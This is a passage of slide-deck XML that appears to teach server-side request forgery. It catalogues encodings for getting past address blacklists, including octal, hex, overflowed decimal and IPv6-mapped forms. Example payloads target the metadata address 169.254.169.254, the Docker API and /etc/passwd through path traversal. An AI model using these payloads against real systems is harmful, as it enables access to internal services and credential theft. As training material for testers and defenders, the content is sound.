      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="493" name="Google Shape;493;p61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94" name="Google Shape;494;p61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61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496" name="Google Shape;49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61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98" name="Google Shape;498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3110050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61"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3189325" y="3081550"/>
            <a:ext cx="1954200" cy="28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61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01" name="Google Shape;501;p6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2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Drop The Zeros </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e.g. http://127.0.0.1 → http://127.1</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> To Bypass Blacklist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507" name="Google Shape;507;p62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08" name="Google Shape;508;p62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62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510" name="Google Shape;51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6000" y="2675525"/>
            <a:ext cx="4973701" cy="20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62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13" name="Google Shape;513;p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3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Add </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Extra Zeros e.g. https://127.000.000.00000000001</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> To Bypass Blacklist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519" name="Google Shape;519;p63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20" name="Google Shape;520;p63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63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522" name="Google Shape;52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63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24" name="Google Shape;524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36000" y="2675525"/>
            <a:ext cx="4973700" cy="20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4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Dotted Decimal With Overflow e.g. http://425.510.425.510/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Bypass Blacklist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531" name="Google Shape;531;p64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/Interaction-File-URL HTTP/1.1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File-URL=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://425.510.425.510/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t> 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532" name="Google Shape;532;p64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33" name="Google Shape;533;p64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64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535" name="Google Shape;53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64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37" name="Google Shape;537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38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5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Dotless Decimal e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://2852039166/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Bypass Blacklist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543" name="Google Shape;543;p65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/Interaction-File-URL HTTP/1.1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File-URL=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://2852039166/</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="544" name="Google Shape;544;p65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45" name="Google Shape;545;p65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65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547" name="Google Shape;547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65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49" name="Google Shape;549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38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6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Dotless Decimal </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>With Overflow </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://7147006462/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To Bypass Blacklist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555" name="Google Shape;555;p66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/Interaction-File-URL HTTP/1.1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File-URL=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://7147006462/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="556" name="Google Shape;556;p66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57" name="Google Shape;557;p66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66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559" name="Google Shape;55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66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61" name="Google Shape;561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38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7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Dotted Hexadecimal</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://0xA9.0xFE.0xA9.0xFE/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To Bypass Blacklist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567" name="Google Shape;567;p67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/Interaction-File-URL HTTP/1.1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File-URL=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://0xA9.0xFE.0xA9.0xFE/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="568" name="Google Shape;568;p67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69" name="Google Shape;569;p67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67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571" name="Google Shape;57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67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73" name="Google Shape;573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38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p67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75" name="Google Shape;575;p6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025" y="3091500"/>
            <a:ext cx="421000" cy="3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68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Dotless Hexadecimal e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://0xA9FEA9FE/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To Bypass Blacklist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581" name="Google Shape;581;p68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/Interaction-File-URL HTTP/1.1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File-URL=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://0xA9FEA9FE/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="582" name="Google Shape;582;p68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83" name="Google Shape;583;p68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68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585" name="Google Shape;585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68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87" name="Google Shape;587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38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2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Use Chineese Separator </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%E3%80%82 </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Instead Of DOT </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e.g. %E3%80%82%E3%80%82/etc/passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> To Get Content Of etc/passwd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230" name="Google Shape;230;p42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31" name="Google Shape;231;p42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42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33" name="Google Shape;23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42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35" name="Google Shape;235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36000" y="2675525"/>
            <a:ext cx="4973701" cy="20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69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Dotless Hexadecimal </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>With Overflow</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://0x41414141A9FEA9FE/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Bypass Blacklist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593" name="Google Shape;593;p69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/Interaction-File-URL HTTP/1.1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File-URL=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://0x41414141A9FEA9FE/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="594" name="Google Shape;594;p69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95" name="Google Shape;595;p69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69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597" name="Google Shape;597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69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99" name="Google Shape;599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38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0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Dotted Octal</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://0251.0376.0251.0376/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Bypass Blacklist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605" name="Google Shape;605;p70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/Interaction-File-URL HTTP/1.1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File-URL=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://0251.0376.0251.0376/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="606" name="Google Shape;606;p70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07" name="Google Shape;607;p70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70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609" name="Google Shape;609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70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11" name="Google Shape;611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38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71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Dotted Octal With Padding</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://0251.00376.000251.0000376/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Bypass Blacklist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617" name="Google Shape;617;p71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/Interaction-File-URL HTTP/1.1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File-URL=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://0251.00376.000251.0000376/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="618" name="Google Shape;618;p71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19" name="Google Shape;619;p71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71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621" name="Google Shape;621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71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23" name="Google Shape;623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38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72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Mix Them e.g.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0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Decimal Overflow + Hex + Octal</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://425.254.0xa9.0376/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Bypass Blacklist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629" name="Google Shape;629;p72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/Interaction-File-URL HTTP/1.1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File-URL=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://425.254.0xa9.0376/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="630" name="Google Shape;630;p72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31" name="Google Shape;631;p72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72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633" name="Google Shape;633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72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35" name="Google Shape;635;p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38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73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Convert Only Parts Of The Address </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Octal + Hex + 2-Byte Wide Dotless Decimal</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://0251.0xfe.43518/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700"/>
              <a:t>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/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://0251.254.169.254</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Bypass Blacklist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641" name="Google Shape;641;p73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/Interaction-File-URL HTTP/1.1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File-URL=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://0251.0xfe.43518/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="642" name="Google Shape;642;p73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43" name="Google Shape;643;p73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73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645" name="Google Shape;645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73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47" name="Google Shape;647;p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38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Google Shape;648;p73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49" name="Google Shape;649;p7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925" y="3110050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74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IPv4-Compatible Address</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://[::169.254.169.254]/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Bypass Blacklist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655" name="Google Shape;655;p74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/Interaction-File-URL HTTP/1.1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File-URL=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://[::169.254.169.254]/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="656" name="Google Shape;656;p74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57" name="Google Shape;657;p74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74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659" name="Google Shape;659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Google Shape;660;p74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61" name="Google Shape;661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38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75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IPv4-Mapped Address e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://[::ffff:169.254.169.254]/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Bypass Blacklist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667" name="Google Shape;667;p75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/Interaction-File-URL HTTP/1.1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File-URL=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://[::ffff:169.254.169.254]/</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="668" name="Google Shape;668;p75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69" name="Google Shape;669;p75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75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671" name="Google Shape;671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75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73" name="Google Shape;673;p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38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76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http://127.127.127.127</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Bypass Blacklist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679" name="Google Shape;679;p76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/Interaction-File-URL HTTP/1.1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File-URL=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://127.127.127.127.127/</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="680" name="Google Shape;680;p76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81" name="Google Shape;681;p76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76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683" name="Google Shape;683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76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85" name="Google Shape;685;p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38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77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http://0.0.0.0:PORT</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Bypass Blacklist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691" name="Google Shape;691;p77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/Interaction-File-URL HTTP/1.1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File-URL=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://0.0.0..0:PORT/</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="692" name="Google Shape;692;p77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93" name="Google Shape;693;p77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77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695" name="Google Shape;695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Google Shape;696;p77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97" name="Google Shape;697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38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77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99" name="Google Shape;699;p7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025" y="3091500"/>
            <a:ext cx="421000" cy="3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78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http://[::1]:PORT e.g. http://[::1]:2375/containers/json</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700"/>
              <a:t>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/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://[::]</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Bypass Blacklist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705" name="Google Shape;705;p78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/Interaction-File-URL HTTP/1.1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File-URL=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://[::1]:2375/containers/json</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="706" name="Google Shape;706;p78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07" name="Google Shape;707;p78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78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709" name="Google Shape;709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Google Shape;710;p78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711" name="Google Shape;711;p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38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p78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713" name="Google Shape;713;p7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925" y="3110050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78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715" name="Google Shape;715;p7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4025" y="3537325"/>
            <a:ext cx="421000" cy="3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6" name="Google Shape;716;p7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64025" y="39399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78"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="387947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718" name="Google Shape;718;p7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22925" y="4311450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Google Shape;719;p78"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="42771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Inject</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ../../../../../etc/passwd%00 </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Get Content Of etc/passwd If There Is LFI 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242" name="Google Shape;242;p43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/Interaction-File-URL HTTP/1.1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File-URL=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>../../../../../etc/passwd%00</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="243" name="Google Shape;243;p43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44" name="Google Shape;244;p43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43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46" name="Google Shape;24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3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48" name="Google Shape;248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350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79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Redirection </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Bypass Blacklist </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e.g. http://nicob.net/redir-http-I.P.v.4:PORT </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Will Redirect You To</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> I.P.v.4:PORT</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700"/>
              <a:t> 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725" name="Google Shape;725;p79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/Interaction-File-URL HTTP/1.1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File-URL=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://nicob.net/redir-http-I.P.v.4:PORT</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="726" name="Google Shape;726;p79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27" name="Google Shape;727;p79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79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729" name="Google Shape;729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79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731" name="Google Shape;731;p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38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80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37" name="Google Shape;737;p80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80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List Of Patterns To Bypass The Whitelist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739" name="Google Shape;739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0" name="Google Shape;740;p80"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="258050" y="28779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741" name="Google Shape;741;p80"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="252625" y="327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Payloads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742" name="Google Shape;742;p80"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3136000" y="1389075"/>
            <a:ext cx="4973700" cy="3357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b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://google.com:80+&amp;@127.88.23.245:22/#+@google.com:80/</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
